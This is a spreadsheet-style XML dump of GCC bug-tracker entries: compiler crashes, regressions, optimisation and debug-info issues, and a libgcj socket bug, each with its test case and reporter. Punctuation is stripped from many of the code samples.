  <si>
    <t>GCC-33516</t>
  </si>
  <si>
    <t>[4.2 Regression] Rejects typedef qualified name-lookup</t>
  </si>
  <si>
    <t>struct foo_bar
typedef foo_bar bar
struct foo_bar {
         typedef int     baz
         bar::baz   ii   
}
t.C:7: error: â€˜bazâ€™ in class â€˜barâ€™ does not name a type
or as originally reported:
struct foo_bar
namespace foo {
         typedef foo_bar bar
}
struct foo_bar {
         typedef int     baz
         foo::bar::baz   ii
}
t.C:9: error: â€˜bazâ€™ in class â€˜foo::barâ€™ does not name a type
moving the declaration of ii out of foo_bar the code is accepted:
struct foo_bar
typedef foo_bar bar
struct foo_bar {
         typedef int     baz
}
bar::baz   ii
EDG happily accepts the code in strict-ansi mode.</t>
  </si>
  <si>
    <t>GCC-64433</t>
  </si>
  <si>
    <t>Segmentation fault while compiling</t>
  </si>
  <si>
    <t>This code causes segmentation fault while compiling.
#include 
template
class N {
    static constexpr int num = Num
}
template using NDef = N
template using TDef = NDef
GCC version: 4.9.2
compiled with: g++ --std=c++11 -c test.cpp
system: Linux 3.18.1-1-ARCH #1 SMP PREEMPT Wed Dec 17 15:40:09 CET 2014 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>aleksis</t>
  </si>
  <si>
    <t>GCC-10568</t>
  </si>
  <si>
    <t>[3.4 regression] libstdc++ template instantiation failure on AIX</t>
  </si>
  <si>
    <t xml:space="preserve">From: Mark Mitchell 
To: dje@gcc.gnu.org dje@watson.ibm.com gcc-bugs@gcc.gnu.org  gcc-prs@gcc.gnu.org mmitchel@gcc.gnu.org nobody@gcc.gnu.org  gcc-gnats@gcc.gnu.org
Cc:  
Subject: Re: c++/10568: [3.4 regression] libstdc++ template instantiation
	failure on AIX
Date: 30 Apr 2003 10:01:38 -0700
 On Wed 2003-04-30 at 09:52 dje@gcc.gnu.org wrote:
 &gt; Old Synopsis: Template instantiation failure on AIX
 &gt; New Synopsis: [3.4 regression] libstdc++ template instantiation failure on AIX
 Does this happen on 3.3 as well or just 3.4?
 Thanks
 Mark Mitchell 
 CodeSourcery LLC
</t>
  </si>
  <si>
    <t>GCC-25067</t>
  </si>
  <si>
    <t>segfault on READ statement with FMT=* and REC</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
    read(5FMT=*REC=10) I
END</t>
  </si>
  <si>
    <t>GCC-29384</t>
  </si>
  <si>
    <t>internal compiler error: in insn_default_length at insn-attrtab.c:1134</t>
  </si>
  <si>
    <t>Hello
I am currently using GCC compiler (3.4.4) on Mips target with following options:
mipsisa32-elf-gcc -mips16 -msoft-float -EB -fdata-sections -fno-exceptions -MD
-g -G0 -I. -I... -Wall -Wpointer-arith -Winline
 -Wundef  -c  ... -c -o c:xxx.c
and during compilation process the following error appears (I have checked previous bug on 
yhe same bug and I hope I will be luckier)
../../../../../app/mmi/common/mmiGenre.c: In function `mmiGenreInit':
../../../../../app/mmi/common/mmiGenre.c:92: error: unrecognizable insn:
(insn 14 13 15 ../../../../../app/mmi/common/mmiGenre.c:81 (set (reg/f:SI 2 $2 [182])
        (mem/u:SI (label_ref 0) [0 S4 A32])) -1 (nil)
    (expr_list:REG_EQUAL (symbol_ref:SI (*isInit.0) [flags 0x2] )
        (nil)))
../../../../../app/mmi/common/mmiGenre.c:92: internal compiler error: in insn_default_length at insn-attrtab.c:1134
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [../../../../bordeaux2/mojo2/Debug/app/mmi/common/mmiGenre.o] Error 1
Source code is the following one:
[Source]
#define MMI_GENRE_START(country genreNum)
#define MMI_GENRE_END(country)
#define MMI_GENRE_TYPE(country genreName nibbleId) strId = eMMISTR_GENRE_##genreName \
    countryRef = eGENRE_COUNTRY_INDEX_##country \
    for(i = 0 i &lt; MMI_GENRE_MAX_NUM i++) \
    {\
        if(gMmiGenre[countryRef][i].name == 0) \
        {\
            gMmiGenre[countryRef][i].name = strId\
            gMmiGenre[countryRef][i].nibble[0] = nibbleId\
            break \
        }\
        if(strId == gMmiGenre[countryRef][i].name) \
        { \
            uint32 j = 0 \
            while(j &lt; MMI_GENRE_MAX_NUM) \
            {\
                if(gMmiGenre[countryRef][i].nibble[j] == 0)\
                {\
                    gMmiGenre[countryRef][i].nibble[j] = nibbleId\
                    break\
                }\
                j++\
            }\
            break\
        }\
    }\
void mmiGenreInit()
{
    static boolean isInit = FALSE
    EMmiStringId strId
    uint32 i = 0
    ECountryId countryRef
    if(!isInit)
    {
    #define GENRE_DEF
		#ifdef GENRE_DEF
		MMI_GENRE_START(UK 8)
		MMI_GENRE_TYPE(UK MOVIE 0x01)
		MMI_GENRE_TYPE(UK NEWS 0x02)
		MMI_GENRE_TYPE(UK NEWS 0x07)
		MMI_GENRE_TYPE(UK NEWS 0x08)
		MMI_GENRE_TYPE(UK ENTERTAINMENT 0x03)
		MMI_GENRE_TYPE(UK ENTERTAINMENT 0x06)
		MMI_GENRE_TYPE(UK SPORTS 0x04)
		MMI_GENRE_TYPE(UK CHILDRENS 0x05)
		MMI_GENRE_TYPE(UK EDUCATION 0x09)
		MMI_GENRE_TYPE(UK LIFESTYLE 0x0A)
		MMI_GENRE_TYPE(UK DRAMA 0x0f)
		MMI_GENRE_END(UK)
		#endif
    #undef GENRE_DEF
    #undef MMI_GENRE_START
    #undef MMI_GENRE_END
    #undef MMI_GENRE_TYPE
    isInit = TRUE
    }
}</t>
  </si>
  <si>
    <t>kavonfr</t>
  </si>
  <si>
    <t>GCC-989</t>
  </si>
  <si>
    <t>Internal error: Floating point exception.</t>
  </si>
  <si>
    <t>g77 -v -save-temps -c -D_BSD_SOURCE -Dntohl=ntohl -D__g77__=2 -O -I. -I/Software/users/gipsy/inc -I- -I/usr/include -ansi -pedantic -Wall descr.c
descr.c:1055: Internal error: Floating point exception.
this error does not occur when -O is omitted.
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
uname -a :
Linux backlund 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
How-To-Repeat:
I hope descr.c and descr.i are sufficient. If not I will
collect everything needed.</t>
  </si>
  <si>
    <t>terlouw</t>
  </si>
  <si>
    <t>GCC-59374</t>
  </si>
  <si>
    <t>[4.8 Regression] -ftree-slp-vectorize breaks unique_ptr's move constructor</t>
  </si>
  <si>
    <t>Created attachment 31358
result of -save-temps
Test file (SmallCore.cpp):
#include 
#include 
using namespace std
class Foo {}
class Bar : public Foo {}
struct StlAllocator {
  StlAllocator() : alloc_(nullptr) {}
  explicit StlAllocator(void* p) : alloc_(p) {}
  void* alloc_
}
struct BarDelete : public StlAllocator {
  void operator()(void*) const {}
}
struct FooDelete : public StlAllocator {
  FooDelete() = default
  /* implicit */ FooDelete(const BarDelete&amp; other) : StlAllocator(other.alloc_)
    {}
  void operator()(void*) const {}
}
unique_ptr myalloc() {
  return unique_ptr(new Bar)
}
void fun(const unique_ptr&amp; foo) {
  cout &lt;&lt; fun  &lt;&lt; foo.get() &lt;&lt; endl
}
int main(int char **) {
  std::unique_ptr foo
  std::unique_ptr bar = myalloc()
  foo = std::move(bar)
  auto p = foo.get()
  cout &lt;&lt; p  &lt;&lt; p &lt;&lt; endl
  if (p != foo.get()) {
    cout &lt;&lt; wtf &lt;&lt; endl
    abort()
  }
  fun(foo)
  return 0
}
Compiled with: g++ -std=c++11 -O -ftree-slp-vectorize SmallCore.cpp
Produces: 
$ ./a.out
p 0x602010
wtf
Aborted
Expected result (up to pointer address):
$ ./a.out
p 0x602010
fun 0x602010
Gcc versions:
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/data/users/bnitka/prefix/ --with-ppl --with-cloog --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++ --disable-gnu-unique-object --enable-linker-build-id --with-gnu-as --with-gnu-ld --disable-multilib --enable-libstdcxx-time
Thread model: posix
gcc version 4.8.1 (GCC)
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/data/users/bnitka/prefix/ --with-ppl --with-cloog --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++ --disable-gnu-unique-object --enable-linker-build-id --with-gnu-as --with-gnu-ld --disable-multilib --enable-libstdcxx-time
Thread model: posix
gcc version 4.9.0 20131202 (experimental) (GCC)
Works on:
gcc-4.7.1</t>
  </si>
  <si>
    <t>niteria</t>
  </si>
  <si>
    <t>GCC-34487</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 regression] ICE using class instead of typename</t>
  </si>
  <si>
    <t>The following invalid testcase triggers an ICE since GCC 4.1.2:
================================================
template struct A
{
  template struct B { typedef A X }
}
template struct C
{
  class A::template B::X x
}
C c
================================================
bug.cc: In instantiation of 'A::B':
bug.cc:8:   instantiated from 'C'
bug.cc:11:   instantiated from here
bug.cc:3: internal compiler error: in instantiate_class_template at cp/pt.c:6765
Please submit a full bug report [etc.]
The code was accepted before.
If I make B a non-template the situation is reversed i.e. the code is
wrongly accepted since GCC 4.1.2 while it ICE'd before:
================================================
template struct A
{
  struct B { typedef A X }
}
template struct C
{
  class A::B::X x
}
C c
================================================
The problem is probably related to PR32029 (which ICEs since GCC 3.4.0 though).</t>
  </si>
  <si>
    <t>GCC-27360</t>
  </si>
  <si>
    <t>Memory leaks when reading logicals</t>
  </si>
  <si>
    <t>It seems that the io library is leaking memory when reading logicals as demonstrated by the small program below when running the program uses more and more memory until it's killed.  I don't see this behaviour with data types other than logicals.
erik:/var/tmp$ cat memoryleak.f90 
program memoryleak
    implicit none
    logical :: foo
    integer :: ios
    ios = 0
    do while (ios == 0)
        read (* * iostat=ios) foo
    end do
end program memoryleak
erik:/var/tmp$ gfortran memoryleak.f90 
erik:/var/tmp$ awk 'BEGIN{while (1) print F}' | a.out
Killed</t>
  </si>
  <si>
    <t>GCC-44061</t>
  </si>
  <si>
    <t>[4.6 Regression] Warns about out-of-bounds array access inside __builtin_constant_p guarded section</t>
  </si>
  <si>
    <t>int a[2]
int foo (int q)
{
  if (__builtin_constant_p (q))
    {
      if (q == 4)
        return a[4]
      else
        return a[0]
    }
  else
    return a[q]
}</t>
  </si>
  <si>
    <t>CLASSPATH-22700</t>
  </si>
  <si>
    <t>Serialization subsystem update</t>
  </si>
  <si>
    <t>This is a major update of the subsystem to make it compatible in behaviour and in facts with the sun's implementation. Some parts of it are still undocumented and will be the object of a next patch.</t>
  </si>
  <si>
    <t>GCC-30486</t>
  </si>
  <si>
    <t>segfault in aggregate_value_p while bootstrapping fortran</t>
  </si>
  <si>
    <t>/scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2-final/./gcc/cc1 -E -lang-fortran -traditional-cpp -D_LANGUAGE_FORTRAN -quiet -v -I. -I/scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/libgfortran -I. -I/scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/libgfortran/../gcc -I/scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/libgfortran/../gcc/config -I../.././gcc -I . -iprefix /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2-final/gcc/../lib/gcc/arm-linux-uclibcgnueabi/4.2.0/ -isystem /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2-final/./gcc/include -DHAVE_CONFIG_H -D_GNU_SOURCE -DPIC -isystem /scratch/obj.x86_64/buildroot.arm/build_arm/staging_dir/arm-linux-uclibcgnueabi/include -isystem /scratch/obj.x86_64/buildroot.arm/build_arm/staging_dir/arm-linux-uclibcgnueabi/sys-include -iquote/scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/libgfortran/io /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/libgfortran/generated/_mod_i8.F90 -Wall -fno-repack-arrays -fno-underscoring -fPIC -fworking-directory -O2 -o ice_on_armeabi.f95
$ egrep -v ^(#|$|!) ice_on_armeabi.f95 
elemental function specific__mod_i8 (p1 p2)
   integer (kind=8) intent (in) :: p1 p2
   integer (kind=8) :: specific__mod_i8
   specific__mod_i8 = mod (p1 p2)
end function
(gdb) run
Starting program: /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2-final/gcc/f951 ice_on_armeabi.f95 -ffree-form -quiet -dumpbase _mod_i8.F90 -auxbase-strip .libs/_mod_i8.o -g -O2 -Wall -version -fno-repack-arrays -fno-underscoring -fPIC -I. -I/scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/libgfortran -I. -I/scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/libgfortran/../gcc -I/scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/libgfortran/../gcc/config -I../.././gcc -I . -fpreprocessed -I finclude -o /dev/null 
GNU F95 version 4.2.0 20070115 (prerelease) (arm-linux-uclibcgnueabi)
        compiled by GNU C version 4.0.3 (Ubuntu 4.0.3-1ubuntu5).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Program received signal SIGSEGV Segmentation fault.
aggregate_value_p (exp=0x0 fntype=0x0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/function.c:1756
1756      tree type = (TYPE_P (exp)) ? exp : TREE_TYPE (exp)
(gdb) bt  
#0  aggregate_value_p (exp=0x0 fntype=0x0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/function.c:1756
#1  0x00000000004dbdc5 in emit_library_call_value_1 (retval=1 
    orgfun=0x2aaaab15ea40 value=0x0 fn_type=LCT_CONST outmode=TImode 
    nargs= p=0x7fffffa29800)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/calls.c:3312
#2  0x00000000004dc435 in emit_library_call_value (orgfun=0x0 value=0x0 
    fn_type=LCT_THROW outmode=TImode nargs=2)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/calls.c:3967
#3  0x00000000005d9b7a in expand_twoval_binop_libfunc (
    binoptab= op0=0x2aaaab1989e0 op1=0x2aaaab1989c0 
    targ0=dwarf2_read_address: Corrupted DWARF expression.
)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/optabs.c:2283
#4  0x000000000052b6e9 in expand_divmod (rem_flag=1 code=TRUNC_MOD_EXPR 
    mode=DImode op0=0x2aaaab1989e0 op1=0x2aaaab1989c0 
    target=0x2aaaab198980 unsignedp=0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/expmed.c:4914
#5  0x0000000000534bcd in expand_expr_real_1 (exp= 
    target=0x2aaaab198980 tmode= 
    modifier= alt_rtl=0x0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/expr.c:8189
#6  0x00000000005382cb in expand_expr_real (exp=0x2aaaab0ec370 
    target=0x2aaaab198980 tmode=DImode modifier=EXPAND_NORMAL alt_rtl=0x0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/expr.c:6706
#7  0x0000000000631324 in expand_return (retval=0x2aaaab0ec5a0) at expr.h:493
#8  0x0000000000534995 in expand_expr_real_1 (exp= 
    target=0x2aaaab0eb400 tmode= 
    modifier= alt_rtl=0x0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/expr.c:8613
#9  0x00000000005382cb in expand_expr_real (exp=0x2aaaab197100 
    target=0x2aaaab0eb400 tmode=VOIDmode modifier=EXPAND_NORMAL alt_rtl=0x0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/expr.c:6706
#10 0x0000000000630fd9 in expand_expr_stmt (exp=0x0) at expr.h:493
#11 0x000000000065ac16 in expand_gimple_basic_block (bb=0x2aaaab19a100)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/cfgexpand.c:1383
#12 0x000000000065bd0b in tree_expand_cfg ()
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/cfgexpand.c:1649
#13 0x00000000006591c8 in execute_one_pass (pass=0x9f89e0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/passes.c:870
#14 0x000000000065933c in execute_pass_list (pass=0x9f89e0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/passes.c:917
#15 0x000000000048df4e in tree_rest_of_compilation (fndecl=0x2aaaab1961c0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/tree-optimize.c:463
#16 0x0000000000694a02 in cgraph_expand_function (node=0x2aaaab192600)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/cgraphunit.c:1241
#17 0x0000000000695382 in cgraph_optimize ()
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/cgraphunit.c:1306
#18 0x0000000000461c2d in gfc_be_parse_file (set_yydebug=)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/fortran/f95-lang.c:307
#19 0x000000000063956e in toplev_main (argc= argv=0x0)
    at /scratch/obj.x86_64/buildroot.arm/toolchain_build_arm/gcc-4.2/gcc/toplev.c:1033
#20 0x00002aaaaae9e49b in __libc_start_main () from /lib/libc.so.6
#21 0x00000000004046da in _start () at ../sysdeps/x86_64/elf/start.S:113
(gdb)</t>
  </si>
  <si>
    <t>GCC-1018</t>
  </si>
  <si>
    <t>make dvi breaks on the languages part</t>
  </si>
  <si>
    <t>when trying to make dvi 
make breaks for not being able to access 
chill.texi
this hapens when using a build dir. separate from the 
source tree as advized in the installation documentation.
Release:
gcc-2.95.2
Environment:
i686-linux-gnu
How-To-Repeat:
follow the installation instructions for 
configure
compilation
then do make dvi in the objdir</t>
  </si>
  <si>
    <t>bobson</t>
  </si>
  <si>
    <t>GCC-40659</t>
  </si>
  <si>
    <t>A simple struct member offset doesn't need a full dwarf location expression</t>
  </si>
  <si>
    <t>dwarf2out.c (add_data_member_location_attribute) always generates a full dwarf location expression even for simple struct member offsets. This results in debug_info for structs that looks like this:
 : Abbrev Number: 7 (DW_TAG_structure_type)
       DW_AT_name        : (indirect string offset: 0x64): mystruct        
       DW_AT_byte_size   : 40       
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 5        
       DW_AT_sibling     :    
 : Abbrev Number: 8 (DW_TAG_member)
       DW_AT_name        : n        
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 6        
       DW_AT_type        :    
       DW_AT_data_member_location: 2 byte block: 23 0       (DW_OP_plus_uconst: 0)
 : Abbrev Number: 8 (DW_TAG_member)
       DW_AT_name        : c        
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 7        
       DW_AT_type        :    
       DW_AT_data_member_location: 2 byte block: 23 8       (DW_OP_plus_uconst: 8)
 : Abbrev Number: 8 (DW_TAG_member)
       DW_AT_name        : i        
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 8        
       DW_AT_type        :    
       DW_AT_data_member_location: 2 byte block: 23 10      (DW_OP_plus_uconst: 16)
The dwarf spec says:
If a data member is defined in a structure union or class the corresponding member entry has a DW_AT_data_member_location attribute whose value describes the location of that member relative to the base address of the structure union or class that most closely encloses the member declaration. If that value is a constant it is the offset in bytes from the beginning of the innermost enclosing structure union or class to the beginning of the data member. Otherwise the value must be a location description.
So if we only have a simple constant offset it seems more space efficient to output the offset as a constant instead of a location expression using DW_OP_plus_uconst.
A suggested patch might be the following (still building/testing against gdb and stap - gdb should work systemtap will need some adjusting):
Index: gcc/dwarf2out.c
===================================================================
--- gcc/dwarf2out.c	(revision 149279)
+++ gcc/dwarf2out.c	(working copy)
@@ -114758 +114756 @@
   if (! loc_descr)
     {
-      enum dwarf_location_atom op
-
       /* The DWARF2 standard says that we should assume that the structure
 	 address is already on the stack so we can specify a structure field
 	 address by using DW_OP_plus_uconst.  */
@@ -1148512 +1148316 @@
       /* ??? The SGI dwarf reader does not handle the DW_OP_plus_uconst
 	 operator correctly.  It works only if we leave the offset on the
 	 stack.  */
+      enum dwarf_location_atom op
+
       op = DW_OP_constu
+      loc_descr = new_loc_descr (op offset 0)
 #else
-      op = DW_OP_plus_uconst
+      /* Don't need an whole location expression just a constant offset. */
+      add_AT_int (die DW_AT_data_member_location offset)
+      return
 #endif
-      loc_descr = new_loc_descr (op offset 0)
     }
   add_AT_loc (die DW_AT_data_member_location loc_descr)
That will simplify the debug_info for structs so it reads:
 : Abbrev Number: 7 (DW_TAG_structure_type)
       DW_AT_name        : (indirect string offset: 0x3d): mystruct        
       DW_AT_byte_size   : 40       
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 4        
       DW_AT_sibling     :    
 : Abbrev Number: 8 (DW_TAG_member)
       DW_AT_name        : n        
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 6        
       DW_AT_type        :    
       DW_AT_data_member_location: 0        
 : Abbrev Number: 8 (DW_TAG_member)
       DW_AT_name        : c        
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 7        
       DW_AT_type        :    
       DW_AT_data_member_location: 8        
 : Abbrev Number: 8 (DW_TAG_member)
       DW_AT_name        : i        
       DW_AT_decl_file   : 1        
       DW_AT_decl_line   : 8        
       DW_AT_type        :    
       DW_AT_data_member_location: 16</t>
  </si>
  <si>
    <t>GCC-10712</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE in constructor_name_full at cp/decl2.c:1255</t>
  </si>
  <si>
    <t>GCC-42699</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] ZERO_EXTRACT on lhs never optimized out</t>
  </si>
  <si>
    <t>As mentioned in http://gcc.gnu.org/ml/gcc/2010-01/msg00033.html the following
testcase is not optimized very well on PowerPC with -O2 -m32 while it works well say on x86_64 or PowerPC -O2 -m64:
union U
{
  unsigned u
  struct
  {
    unsigned b1:2
    unsigned:8
    unsigned b2:2
    unsigned b3:2
    unsigned:18
  } b
}
unsigned
test (void)
{
  union U u
  u.u = 0
  u.b.b1 = 2
  u.b.b2 = 3
  u.b.b3 = 1
  return u.u
}
The problem is that the bitfields aren't converted into and/or operations during tree optimizations and at the RTL level expander emits them using insv insns (i.e. ZERO_EXTRACT on lhs).  While for -m64 (and targets that don't have insv) CSE then manages to optimize the and/or operations with constant arguments down to a return of a constant nothing optimizes the lhs ZERO_EXTRACT.
The gcc ml mail mentioned above claims it is a regression from 2.95 I've just tried 3.4 and it didn't optimize it either but I don't have 2.95 around to test this.</t>
  </si>
  <si>
    <t>GCC-3037</t>
  </si>
  <si>
    <t>ARM port: Wrong flow info after reload</t>
  </si>
  <si>
    <t>As I understand the ARM port have a `(define_expand epilogue ...)'
And this `define_expand' don't emit the moves on RTL level for restoring
a call-saved registers.
While `update_life_info' executed after reload the `mark_regs_live_at_end'
mark all registers used by the epilogue as being live at the end of
the function and don't unmark it because RTL version of epilogue
havn't a moves.
Release:
3.0 20010525 (prerelease)
Environment:
System: Linux localhost 2.3.2 #6 ÐŸÑ‚Ð½ ÐžÐºÑ‚ 13 20:07:05 MSD 2000 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: arm-elf-linux-gnu
configured with: /root/d/cvs/gcc-3.0/configure --target=arm-elf-linux --with-newlib --enable-languages=c : (reconfigured) /root/d/cvs/gcc-3.0/configure --target=arm-elf-linux --with-newlib --enable-languages=c --without-threads : (reconfigured) /root/d/cvs/gcc-3.0/configure --target=arm-elf-linux --with-newlib --enable-languages=c --disable-threads : (reconfigured) /root/d/cvs/gcc-3.0/configure --target=arm-elf-linux --with-newlib --enable-languages=c --disable-threads --disable-shared
How-To-Repeat:
typedef struct {
  int e
  double d[40]
} mp_no
typedef union { int i[2] double d } number
static const number
     radix = {{0x41700000 0x00000000} }
     zero = {{0x00000000 0x00000000} }
     one = {{0x3ff00000 0x00000000} }
     mone = {{0xbff00000 0x00000000} }
void __dbl_mp(double x mp_no *y int p)
{
  int in
  double u
  if (x == zero.d)
      return
  else if (x &gt; zero.d)
      y-&gt;d[0] = one.d
  else
    {
      y-&gt;d[0] = mone.d
      x=-x
    }
  for (  x e -= one.d)
    x *= radix.d
}</t>
  </si>
  <si>
    <t>denisc</t>
  </si>
  <si>
    <t>GCC-13102</t>
  </si>
  <si>
    <t>java.net.Socket#connect doesn't work after java.net.Socket#setSoTimeout</t>
  </si>
  <si>
    <t>When using java.net.Socket interface introduced in Sun JDK1.4
which allows for connection timeouts connection attempt throws:
'Exception in thread main java.net.SocketException: Socket closed'.
gcj -v
Reading specs from c:/spool/Java/thisiscool-gcc/gcc-3.4/bin/..
/lib/gcc/i686-pc-mingw32/3.4/specs
Reading specs from c:/spool/Java/thisiscool-gcc/gcc-3.4/bin/..
/lib/gcc/i686-pc-mingw32/3.4/../../../../i686-pc-mingw32/lib/libgcj.spec
rename spec lib to liborig
Configured with: /datal/gcc/gcc/configure --prefix=/datal/gcc/build/wingcc 
--build=i686-pc-linux-gnu --host=i686-pc-mingw32 --target=i686-pc-mingw32 
--enable-languages=cc++java --with-gcc --with-gnu-as --with-gnu-ld 
--with-as=i686-pc-mingw32-as --with-ld=i686-pc-mingw32-ld --enable-threads=win32 
--disable-nls --disable-win32-registry --disable-shared --disable-debug 
--without-newlib --enable-libgcj --disable-java-awt --without-x 
--enable-java-gc=boehm --disable-libgcj-debug --enable-interpreter 
--enable-hash-synchronization --enable-sjlj-exceptions --enable-libgcj-multifile
Thread model: win32
gcc version 3.4 20031109 (experimental)
(Version 3.4 20030830 has the same bug too).
Testcase (throws Exception becouse of the bug):
/**
 * New socket interface is important for its connection timeouts.
 */
public class TestSocket {
  protected static void test( boolean set ) throws Exception {
    java.net.SocketAddress sa = new java.net.InetSocketAddress( gcc.gnu.org 
80 )
    java.net.Socket socket = new java.net.Socket()
    if( set ){
      // Any of these options leads to Socket closed exception.
      socket.setTcpNoDelay( true )
      socket.setSoLinger( false 1 )
      socket.setSoTimeout( 20 * 1000 )
      socket.setKeepAlive( false )
    }
    socket.connect( sa 30 * 1000 ) // Timeout is 30 seconds.
    socket.close()
  } 
  public static void main( String[] args ) throws Exception {
    test( false ) System.out.println( Socket works without options. )
    test( true ) System.out.println( Socket works with options! )
  }
}
c:\tmp\testCase&gt;gcj -g3 --main=TestSocket TestSocket.java
c:\tmp\testCase&gt;a.exe
Socket works without options.
Exception in thread main java.net.SocketException: Socket closed
   at __ZN10TestSocket4testEb (c:\tmp\testCase\TestSocket.java:11)
   at __ZN10TestSocket4mainEP6JArrayIPN4java4lang6StringEE (c:\tmp\testCase\Test
Socket.java:21)
   at _main (C:\DOCUME~1\Glim\LOCALS~1\Temp\ccY1aaaa.i:11)
c:\tmp\testCase&gt;gcj -O --main=TestSocket TestSocket.java
c:\tmp\testCase&gt;a.exe
Socket works without options.
Exception in thread main java.net.SocketException: Socket closed
   at 0x00413d4e (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x00414292 (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x004308e4 (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x004329f4 (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x004326b4 (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x00466929 (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x00403fb0 (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x0040135d (c:\tmp\testCase\natClass.cc)
   at 0x0040142a (c:\tmp\testCase\natClass.cc)
   at 0x00411b2e (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x0041a210 (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x00403337 (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x00403417 (c:\datal\gcc\gcc\gcc\libgcc2.c)
   at 0x004012d8 (c:\tmp\testCase\natClass.cc)
   at 0x0040117e (c:\tmp\testCase\natClass.cc)
   at 0x00401014 (c:\tmp\testCase\natClass.cc)
   at 0x77e818b5 (Unknown Source)
c:\tmp\testCase&gt;gcj -C TestSocket.java
c:\tmp\testCase&gt;gij TestSocket
Socket works without options.
Exception in thread main java.net.SocketException: Socket closed
   at 0x0040bf3e (Unknown Source)
   at 0x0040c482 (Unknown Source)
   at 0x00441d74 (Unknown Source)
   at 0x0043ef44 (Unknown Source)
   at 0x0045a294 (Unknown Source)
   at 0x004f51a9 (Unknown Source)
   at 0x004c4ff0 (Unknown Source)
   at 0x004ad643 (Unknown Source)
   at 0x00458e15 (Unknown Source)
   at 0x00482d14 (Unknown Source)
   at 0x00458c96 (Unknown Source)
   at 0x004ad643 (Unknown Source)
   at 0x00458e15 (Unknown Source)
   at 0x00482d14 (Unknown Source)
   at 0x00458c96 (Unknown Source)
   at 0x004090fe (Unknown Source)
   at 0x00415e00 (Unknown Source)
   at 0x004033c7 (Unknown Source)
   at 0x0040149b (Unknown Source)
   at 0x0040117e (Unknown Source)
   at 0x00401014 (Unknown Source)
   at 0x77e818b5 (Unknown Source)</t>
  </si>
  <si>
    <t>artem</t>
  </si>
  <si>
    <t>GCC-40486</t>
  </si>
  <si>
    <t>[c++0x] rvalue-references no longer bind to lvalues</t>
  </si>
  <si>
    <t>I'm surprised this hasn't been implemented already. AFAIK it was
accepted and is in the current draft.
